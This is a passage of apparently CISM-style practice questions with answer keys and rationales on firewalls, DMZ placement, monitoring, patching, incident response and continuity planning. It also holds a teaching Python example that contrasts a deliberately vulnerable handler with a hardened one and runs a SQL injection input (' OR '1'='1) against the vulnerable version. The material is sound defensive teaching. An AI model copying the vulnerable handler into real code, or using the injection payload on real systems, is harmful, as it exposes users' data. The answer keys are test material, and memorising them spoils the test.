c. permit traffic load balancing
d. prevent a denial-of-service attack
Having two entry points, each guarded by a separate firewall, is desirable to permit traffic load balancing. As they both connect to the internet and to the same demilitarized zone (DMZ), such an arrangement is not practical for separating test from production or preventing a denial-of-service attack.
-----
60. An extranet server should be placed:
a. outside the firewall
b. on the firewall server
c. on a screened subnet
d. on the external router
An extranet server should be placed on a screened subnet, which is a demilitarized zone (DMZ). Placing it on the internet side of the firewall would leave it defenseless. The same would be true of placing it on the external router, although this would not be possible. Since firewalls should be installed on hardened servers with minimal services enabled, it would be inappropriate to store the extranet on the same physical device.
-----
61. Which of the following is the BEST metric for evaluating the effectiveness of security awareness training? The number of:
a. password resets
b. reported incidents
c. incidents resolved
d. access rule violations
Reported incidents will provide an indicator of the awareness level of staff. An increase in reported incidents could indicate that the staff is paying more attention to security. Password resets and access rule violations may or may not have anything to do with awareness levels. The number of incidents resolved may not correlate to staff awareness.
-----
62. Security monitoring mechanisms should PRIMARILY:
a. focus on business-critical information
b. assist owners to manage control risks
c. focus on detecting network intrusions
d. record all security violations
Security monitoring must focus on business-critical information to remain effectively usable by and credible to business users. Control risk is the possibility that controls would not detect an incident or error condition, and therefore is not a correct answer because monitoring would not directly assist in managing this risk. Network intrusions are not the only focus of monitoring mechanisms; although they should record all security violations, this is not the primary objective.
-----
63. When contracting with an outsourcer to provide security administration, the MOST important contractual element is the:
a. right-to-terminate clause
b. limitations of liability
c. service level agreement (SLA)
d. financial penalties clause
Service level agreements (SLAs) provide metrics to which outsourcing firms can be held accountable. This is more important than a limitation on the outsourcing firm's liability, a right-to-terminate clause or a hold-harmless agreement which involves liabilities to third parties.
-----
64. Which of the following is the BEST metric for evaluating the effectiveness of an intrusion detection mechanism?
a. Number of attacks detected
b. Number of successful attacks
c. Ratio of false positives to false negatives
d. Ratio of successful to unsuccessful attacks
The ratio of false positives to false negatives will indicate whether an intrusion detection system (IDS) is properly tuned to minimize the number of false alarms while, at the same time, minimizing the number of omissions. The number of attacks detected, successful attacks or the ratio of successful to unsuccessful attacks would not indicate whether the IDS is properly configured.
-----
65. Which of the following is MOST effective in preventing weaknesses from being introduced into existing production systems?
a. Patch management
b. Change management
c. Security baselines
d. Virus detection
Change management controls the process of introducing changes to systems. This is often the point at which a weakness will be introduced. Patch management involves the correction of software weaknesses and would necessarily follow change management procedures. Security baselines provide minimum recommended settings and do not prevent introduction of control weaknesses. Virus detection is an effective tool but primarily focuses on malicious code from external sources, and only for those applications that are online.
-----
66. Which of the following is MOST effective in preventing security weaknesses in operating systems?
a. Patch management
b. Change management
c. Security baselines
d. Configuration management
Patch management corrects discovered weaknesses by applying a correction (a patch) to the original program code. Change management controls the process of introducing changes to systems. Security baselines provide minimum recommended settings. Configuration management controls the updates to the production environment.
-----
67. Which of the following is the MOST effective solution for preventing internal users from modifying sensitive and classified information?
a. Baseline security standards
b. System access violation logs
c. Role-based access controls
d. Exit routines
Role-based access controls help ensure that users only have access to files and systems appropriate for their job role. Violation logs are detective and do not prevent unauthorized access. Baseline security standards do not prevent unauthorized access. Exit routines are dependent upon appropriate role-based access.
-----
68. Which of the following is generally used to ensure that information transmitted over the internet is authentic and actually transmitted by the named sender?
a. Biometric authentication
b. Embedded steganographic
c. Two-factor authentication
d. Embedded digital signature
Digital signatures ensure that transmitted information can be attributed to the named sender; this provides nonrepudiation. Steganographic techniques are used to hide messages or data within other files. Biometric and two-factor authentication are not generally used to protect internet data transmissions.
-----
69. What is an appropriate frequency for updating operating system (OS) patches on production servers?
a. During scheduled rollouts of new applications
b. According to a fixed security patch management schedule
c. Concurrently with quarterly hardware maintenance
d. Whenever important security patches are released
Patches should be applied whenever important security updates are released. They should not be delayed to coincide with other scheduled rollouts or maintenance. Due to the possibility of creating a system outage, they should not be deployed during critical periods of application activity such as month-end or quarter-end closing.
-----
70. A border router should be placed on which of the following?
a. Web server
b. IDS server
c. Screened subnet
d. Domain boundary
A border router should be placed on a (security) domain boundary. Placing it on a web server or screened subnet, which is a demilitarized zone (DMZ) would not provide any protection. Border routers are positioned on the boundary of the network, but do not reside on a server.
-----
71. An e-commerce order fulfillment web server should generally be placed on which of the following?
a. Internal network
b. Demilitarized Zone (DMZ)
c. Database server
d. Domain controller
An e-commerce order fulfillment web server should be placed within a DMZ to protect it and the internal network from external attack. Placing it on the internal network would expose the internal network to potential attack from the internet. Since a database server should reside on the internal network, the same exposure would exist. Domain controllers would not normally share the same physical device as a web server.
-----
72. Secure customer use of an e-commerce application can BEST be accomplished through:
a. data encryption
b. digital signatures
c. strong passwords
d. two-factor authentication
Encryption would be the preferred method of ensuring confidentiality in customer communications with an e-commerce application. Strong passwords, by themselves, would not be sufficient since the data could still be intercepted, while two-factor authentication would be impractical. Digital signatures would not provide a secure means of communication. In most business-to-customer (B-to-C) web applications, a digital signature is also not a practical solution.
-----
73. What is the BEST defense against a Structured Query Language (SQL) injection attack?
a. Regularly updated signature files
b. A properly configured firewall
c. An intrusion detection system
d. Strict controls on input fields
Structured Query Language (SQL) injection involves the typing of programming command statements within a data entry field on a web page, usually with the intent of fooling the application into thinking that a valid password has been entered in the password entry field. The best defense against such an attack is to have strict edits on what can be typed into a data input field so that programming commands will be rejected. Code reviews should also be conducted to ensure that such edits are in place and that there are no inherent weaknesses in the way the code is written; software is available to test for such weaknesses. All other choices would fail to prevent such an attack.
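The two web application findings in this exam set (question 50, an employee ID in the URL that is trusted without re-checking the logged-in user, and question 73, a data input field that reaches SQL unfiltered) are illustrated below by a handler written for this page, not taken from ISACA or from any real application. The vulnerable handler shows both defects; the hardened handler applies the strict input edit the answer calls for, re-checks authorization against the session, and passes the value as a bound parameter, which goes slightly beyond the page's "strict edits" by making the command/data boundary explicit. Table, employee IDs and the `Session` class are constructed for the example.

```python
import re
import sqlite3


def make_db():
    """Constructed sample data: an in-memory accounts table with two employees."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE accounts (emp_id TEXT PRIMARY KEY, name TEXT, balance INTEGER)"
    )
    conn.executemany(
        "INSERT INTO accounts VALUES (?, ?, ?)",
        [("1001", "alice", 500), ("1002", "bob", 750)],
    )
    conn.commit()
    return conn


class Session:
    """Hypothetical stand-in for the framework's authenticated session object."""

    def __init__(self, emp_id):
        self.emp_id = emp_id  # employee ID established at logon


# Strict edit on the input field (question 73): an employee ID is exactly four digits.
EMP_ID_RE = re.compile(r"\d{4}")


def vulnerable_account_view(conn, session, emp_id_from_url):
    """The 'before' handler: the URL parameter is trusted as-is.

    Question 50: any valid employee ID returns that employee's account, even
    though the session belongs to someone else.
    Question 73: the value is concatenated into SQL, so command text typed into
    the field is executed rather than treated as data.
    """
    query = "SELECT name, balance FROM accounts WHERE emp_id = '%s'" % emp_id_from_url
    return conn.execute(query).fetchall()


def hardened_account_view(conn, session, emp_id_from_url, audit_log=None):
    """The 'after' handler: validate, re-authorize against the session, bind.

    Returns a dict shaped like an HTTP response: status plus account or error.
    Denied requests are appended to audit_log (a list) so that ID-tampering
    attempts are visible to monitoring, which the page's question 61/62
    answers treat as the point of security monitoring.
    """
    if audit_log is None:
        audit_log = []
    # 1. Strict input edit: reject anything that is not a well-formed employee ID.
    if not EMP_ID_RE.fullmatch(emp_id_from_url):
        audit_log.append(("reject_malformed_id", session.emp_id, emp_id_from_url))
        return {"status": 400, "error": "invalid employee id"}
    # 2. Re-check authorization every time the parameter is supplied: the
    #    requested ID must be the one bound to the authenticated session.
    if emp_id_from_url != session.emp_id:
        audit_log.append(("deny_other_account", session.emp_id, emp_id_from_url))
        return {"status": 403, "error": "forbidden"}
    # 3. Bound parameter: the driver sends the value as data, never as SQL text.
    row = conn.execute(
        "SELECT name, balance FROM accounts WHERE emp_id = ?", (emp_id_from_url,)
    ).fetchone()
    if row is None:
        return {"status": 404, "error": "no such account"}
    return {"status": 200, "account": {"name": row[0], "balance": row[1]}}


if __name__ == "__main__":
    db = make_db()
    alice = Session("1001")
    log = []
    # Vulnerable: alice's session reads bob's account, and a quoted expression
    # in the field returns every row.
    print(vulnerable_account_view(db, alice, "1002"))
    print(vulnerable_account_view(db, alice, "' OR '1'='1"))
    # Hardened: only alice's own account is served; the other two are refused.
    print(hardened_account_view(db, alice, "1001", log))
    print(hardened_account_view(db, alice, "1002", log))
    print(hardened_account_view(db, alice, "' OR '1'='1", log))
    print(log)
```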
-----
74. Which of the following is the MOST important consideration when implementing an intrusion detection system (IDS)?
a. Tuning
b. Patching
c. Encryption
d. Packet filtering
If an intrusion detection system (IDS) is not properly tuned it will generate an unacceptable number of false positives and/or fail to sound an alarm when an actual attack is underway. Patching is more related to operating system hardening, while encryption and packet filtering would not be as relevant.
-----
75. Which of the following is the MOST important consideration when securing customer credit card data acquired by a point-of-sale (POS) cash register?
a. Authentication
b. Hardening
c. Encryption
d. Nonrepudiation
Cardholder data should be encrypted using strong encryption techniques. Hardening would be secondary in importance, while nonrepudiation would not be as relevant. Authentication of the point-of-sale (POS) terminal is a previous step to acquiring the card information.
-----
76. Which of the following practices is BEST to remove system access for contractors and other temporary users when it is no longer required?
a. Log all account usage and send it to their manager
b. Establish predetermined automatic expiration dates
c. Require managers to e-mail security when the user leaves
d. Ensure each individual has signed a security acknowledgement
Predetermined expiration dates are the most effective means of removing systems access for temporary users. Reliance on managers to promptly send in termination notices cannot always be counted on, while requiring each individual to sign a security acknowledgement would have little effect in this case.
-----
77. Which of the following is MOST important for a successful information security program?
a. Adequate training on emerging security technologies
b. Open communication with process owners
c. Adequate policies, standards and procedures
d. Executive management commitment
Sufficient executive management support is the most important factor for the success of an information security program. Open communication, adequate training, and good policies and procedures, while important, are not as important as support from top management; they will not ensure success if senior management support is not present.
-----
78. When considering the value of assets, which of the following would give the information security manager the MOST objective basis for measurement of value delivery in information security governance?
a. Number of controls
b. Cost of achieving control objectives
c. Effectiveness of controls
d. Test results of controls
Comparison of cost of achievement of control objectives and corresponding value of assets sought to be protected would provide a sound basis for the information security manager to measure value delivery. Number of controls has no correlation with the value of assets unless the effectiveness of the controls and their cost are also evaluated. Effectiveness of controls has no correlation with the value of assets unless their costs are also evaluated. Test results of controls have no correlation with the value of assets unless the effectiveness of the controls and their cost are also evaluated.
-----
79. Which of the following, using public key cryptography, ensures authentication, confidentiality and nonrepudiation of a message?
a. Encrypting first by receiver's private key and second by sender's public key
b. Encrypting first by sender's private key and second by receiver's public key
c. Encrypting first by sender's private key and second decrypting by sender's public key
d. Encrypting first by sender's public key and second by receiver's private key
Encrypting by the sender's private key ensures authentication. By being able to decrypt with the sender's public key, the receiver would know that the message is sent by the sender only and the sender cannot deny/repudiate the message. By encrypting with the receiver's public key secondly, only the receiver will be able to decrypt the message and confidentiality is assured. The receiver's private key is private to the receiver and the sender cannot have it for encryption. Similarly, the receiver will not have the private key of the sender to decrypt the second-level encryption. In the case of encrypting first by the sender's private key and, second, decrypting by the sender's public key, confidentiality is not ensured since the message can be decrypted by anyone using the sender's public key. The receiver's private key would not be available to the sender for second-level encryption. Similarly, the sender's private key would not be available to the receiver for decrypting the message.
-----
80. A test plan to validate the security controls of a new system should be developed during which phase of the project?
a. Testing
b. Initiation
c. Design
d. Development
In the design phase, security checkpoints are defined and a test plan is developed. The testing phase is too late since the system has already been developed and is in production testing. In the initiation phase, the basic security objective of the project is acknowledged. Development is the coding phase and is too late to consider test plans.
-----
81. The MOST effective way to ensure that outsourced service providers comply with the organization's information security policy would be:
a. service level monitoring
b. penetration testing
c. periodically auditing
d. security awareness training
Regular audit exercises can spot gaps in information security compliance. Service level monitoring can only pinpoint operational issues in the organization's operational environment. Penetration testing can identify security vulnerabilities but cannot ensure information security compliance. Training can increase users' awareness of the information security policy, but is not more effective than auditing.
-----
82. In order to protect a network against unauthorized external connections to corporate systems, the information security manager should BEST implement:
a. a strong authentication
b. IP antispoofing filtering
c. network encryption protocol
d. access list of trusted devices
Strong authentication will provide adequate assurance on the identity of the users, while IP antispoofing is aimed at the device rather than the user. Encryption protocol ensures data confidentiality and authenticity while access lists of trusted devices are easily exploited by spoofed identity of the clients.
-----
Domain 4 - Information Security Incident Management (18%)
83. Which of the following terms and conditions represent a significant deficiency if included in a commercial hot site contract?
a. A hot site facility will be shared in multiple disaster declarations.
b. All equipment is provided "at time of disaster, not on floor".
c. The facility is subject to a "first-come, first-served" policy
d. Equipment may be substituted with equivalent model
Equipment provided "at time of disaster (ATOD), not on floor" means that the equipment is not available but will be acquired by the commercial hot site provider on a best effort basis. This leaves the customer at the mercy of the marketplace. If equipment is not immediately available, the recovery will be delayed. Many commercial providers do require sharing facilities in cases where there are multiple simultaneous declarations, and that priority may be established on a first-come, first-served basis. It is also common for the provider to substitute equivalent or better equipment, as they are frequently upgrading and changing equipment.
-----
84. Which of the following should be performed FIRST in the aftermath of a denial-of-service attack?
a. Restore servers from backup media stored offsite.
b. Conduct an assessment to determine system status
c. Perform an impact analysis of the outage.
d. Isolate the screened subnet.
An assessment should be conducted to determine whether any permanent damage occurred and the overall system status. It is not necessary at this point to rebuild any servers. An impact analysis of the outage or isolating the demilitarized zone (DMZ) or screened subnet will not provide any immediate benefit.
-----
85. Which of the following is the MOST important element to ensure the successful recovery of a business during a disaster?
a. Detailed technical recovery plans are maintained offsite.
b. Network redundancy is maintained through separate providers.
c. Hot site equipment needs are recertified on a regular basis
d. Appropriate declaration criteria have been established.
In a major disaster, staff can be injured or can be prevented from traveling to the hot site, so technical skills and business knowledge can be lost. It is therefore critical to maintain an updated copy of the detailed recovery plan at an offsite location. Continuity of the business requires adequate network redundancy, hot site infrastructure that is certified as compatible and clear criteria for declaring a disaster. Ideally, the business continuity program addresses all of these satisfactorily. However, in a disaster situation, where all these elements are present, but without the detailed technical plan, business recovery will be seriously impaired.
-----
86. The business continuity policy should contain which of the following?
a. Emergency call trees.
b. Recovery criteria
c. Business impact assessment (BIA)
d. Critical backups inventory
Recovery criteria, indicating the circumstances under which specific actions are undertaken, should be contained within a business continuity policy. Telephone trees, business impact assessments (BIAs) and listings of critical backup files are too detailed to include in a policy document.
-----
87. The PRIMARY purpose of installing an intrusion detection system (IDS) is to identify:
a. weaknesses in network security.
b. patterns of suspicious access.
c. how an attack was launched on the network.
d. potential attacks on the internal network.
The most important function of an intrusion detection system (IDS) is to identify potential attacks on the network. Identifying how the attack was launched is secondary. It is not designed specifically to identify weaknesses in network security or to identify patterns of suspicious logon attempts.
-----
88. Which of the following would represent a violation of the chain of custody when a backup tape has been identified as evidence in a fraud investigation? The tape was:
a. removed into the custody of law enforcement investigators.
b. kept in the tape library pending further analysis.
c. sealed in a signed envelope and locked in a safe under dual control.
d. handed over to authorized independent investigators.
Since a number of individuals would have access to the tape library, and could have accessed and tampered with the tape, the chain of custody could not be verified. All other choices provide clear indication of who was in custody of the tape at all times.
-----
89. When properly tested, which of the following would MOST effectively support an information security manager in handling a security breach?
a. Business continuity plan
b. Disaster recovery plan
c. Incident response plan
d. Vulnerability management plan
An incident response plan documents the step-by-step process to follow, as well as the related roles and responsibilities pertaining to all parties involved in responding to an information security breach. A business continuity plan or disaster recovery plan would be triggered during the execution of the incident response plan in the case of a breach impacting the business continuity. A vulnerability management plan is a procedure to address technical vulnerabilities and mitigate the risk through configuration changes (patch management).
-----
90. Isolation and containment measures for a compromised computer have been taken and information security management is now investigating. What is the MOST appropriate next step?
a. Run a forensics tool on the machine to gather evidence.
b. Reboot the machine to break remote connections.
c. Make a copy of the whole system's memory.
d. Document current connections and open Transmission Control Protocol/User Datagram Protocol (TCP/UDP) ports.
When investigating a security breach, it is important to preserve all traces of evidence left by the invader. For this reason, it is imperative to preserve the memory contents of the machine in order to analyze them later. The correct answer is choice C because a copy of the whole system's memory is obtained for future analysis by running the appropriate tools. This is also important from a legal perspective since an attorney may suggest that the system was changed during the conduct of the investigation. Running a computer forensics tool on the compromised machine will cause the creation of at least one process that may overwrite evidence. Rebooting the machine will delete the contents of the memory, erasing potential evidence. Collecting information about current connections and open Transmission Control Protocol/User Datagram Protocol (TCP/UDP) ports is correct, but doing so by using tools may also erase memory contents.
-----
91. The recovery point objective (RPO) requires which of the following?
a. Disaster declaration
b. Before-image restoration
c. System restoration
d. After-image processing
The recovery point objective (RPO) is the point in the processing flow at which system recovery should occur. This is the predetermined state of the application processing and data used to restore the system and to continue the processing flow. Disaster declaration is independent of this processing checkpoint. Restoration of the system can occur at a later date, as does the return to normal, after-image processing.
-----
92. Who would be in the BEST position to determine the recovery point objective (RPO) for business applications?
a. Business continuity coordinator
b. Chief operations officer (COO)
c. Information security manager
d. Internal audit
The recovery point objective (RPO) is the processing checkpoint to which systems are recovered. In addition to data owners, the chief operations officer (COO) is the most knowledgeable person to make this decision. It would be inappropriate for the information security manager or internal audit to determine the RPO because they are not directly responsible for the data or the operation.
-----
93. When the computer incident response team (CIRT) finds clear evidence that a hacker has penetrated the corporate network and modified customer information, an information security manager should FIRST notify:
a. the information security steering committee.
b. customers who may be impacted.
c. data owners who may be impacted.
d. regulatory agencies overseeing privacy.
The data owners should be notified first so they can take steps to determine the extent of the damage and coordinate a plan for corrective action with the computer incident response team. Other parties will be notified later as required by corporate policy and regulatory requirements.
-----
94. The systems administrator did not immediately notify the security officer about a malicious attack. An information security manager could prevent this situation by:
a. periodically testing the incident response plans.
b. regularly testing the intrusion detection system (IDS).
c. establishing mandatory training of all personnel.
d. periodically reviewing incident response procedures.
Security incident response plans should be tested to find any deficiencies and improve existing processes. Testing the intrusion detection system (IDS) is a good practice but would not have prevented this situation. All personnel need to go through formal training to ensure that they understand the process, tools and methodology involved in handling security incidents. However, testing of the actual plans is more effective in ensuring the process works as intended. Reviewing the response procedures is not enough; the security response plan needs to be tested on a regular basis.
-----
95. Which of the following would a security manager establish to determine the target for restoration of normal processing?
a. Recovery time objective (RTO)
b. Maximum tolerable outage (MTO)
c. Recovery point objectives (RPOs)
d. Services delivery objectives (SDOs)
Recovery time objective (RTO) is the length of time from the moment of an interruption until the time the process must be functioning at a service level sufficient to limit financial and operational impacts to an acceptable level. Maximum tolerable outage (MTO) is the maximum time for which an organization can operate in a reduced mode. Recovery point objectives (RPOs) relate to the age of the data required for recovery. Services delivery objectives (SDOs) are the levels of service required in reduced mode.
-----
96. Which of the following should be the PRIMARY basis for making a decision to establish an alternate site for disaster recovery?
a. A business impact analysis (BIA), which identifies the requirements for continuous availability of critical business processes.
b. Adequate distance between the primary site and the alternate site so that the same disaster does not simultaneously impact both sites.
c. A benchmarking analysis of similarly situated enterprises in the same geographic region to demonstrate due diligence.
d. Differences between the regulatory requirements applicable at the primary site and those at the alternate site.
The BIA will help determine the recovery time objective (RTO) and recovery point objective (RPO) for the enterprise. This information will drive the decision on the appropriate level of protection for its assets. Natural disasters and regulatory requirements are just two of many factors that an enterprise must consider when it decides whether to pursue an alternate site for disaster recovery. While a benchmark could provide useful information, the decision should be based on a BIA, which considers factors specific to the enterprise.
-----
97. During a business continuity plan (BCP) test, one department discovered that its new software application was not going to be restored soon enough to meet the needs of the business. This situation can be avoided in the future by:
a. conducting a periodic and event-driven business impact analysis (BIA) to determine the needs of the business during a recovery.
b. assigning new applications a higher degree of importance and scheduling them for recovery first.
c. developing a help-desk ticket process that allows departments to request recovery of software during a disaster.
d. conducting a thorough risk assessment prior to purchasing the software.
A periodic BIA can help compensate for changes in the needs of the business for recovery during a disaster. Choice B is an incorrect assumption regarding the automatic importance of a new program. Choice C is not an appropriate recovery procedure because it allows individual business units to make unilateral decisions without consideration of broader implications. The risk assessment may not include the BIA.
-----
98. The main mail server of a financial institution has been compromised at the superuser level; the only way to ensure the system is secure would be to:
a. change the root password of the system.
b. implement multifactor authentication.
c. rebuild the system from the original installation medium.
d. disconnect the mail server from the network.
Rebuilding the system from the original installation medium is the only way to ensure that all security vulnerabilities and potential stealth malicious programs have been destroyed. Changing the root password of the system does not ensure the integrity of the mail server. Implementing multifactor authentication is a measure taken afterward and does not clear existing security threats. Disconnecting the mail server from the network is an initial step, but does not guarantee security.
-----
99. Which of the following would present the GREATEST risk to information security?
a. Virus signature file updates are applied to all servers every day.
b. Security access logs are reviewed within five business days.
c. Critical patches are applied within 24 hours of their release.
d. Security incidents are investigated within five business days.
Security incident records capture system events that are important from the security perspective; they include incidents also captured in the security access logs and other monitoring tools. Although, in some instances, they could wait for a few days before they are researched, of the options given this would present the greatest risk to security. Most often, they should be analyzed as soon as possible. Virus signatures should be updated as often as they are made available by the vendor, while critical patches should be installed as soon as they are reviewed and tested, which could occur within 24 hours.
-----
100. Which of the following is the MOST important area of focus when examining potential security compromise of a new wireless network?
a. Signal strength
b. Number of administrators
c. Bandwidth
d. Encryption strength
The number of individuals with access to the network configuration presents a security risk. Encryption strength is an area where wireless networks tend to fall short; however, the potential to compromise the entire network is higher when an inappropriate number of people can alter the configuration. Signal strength and network bandwidth are secondary issues.
-----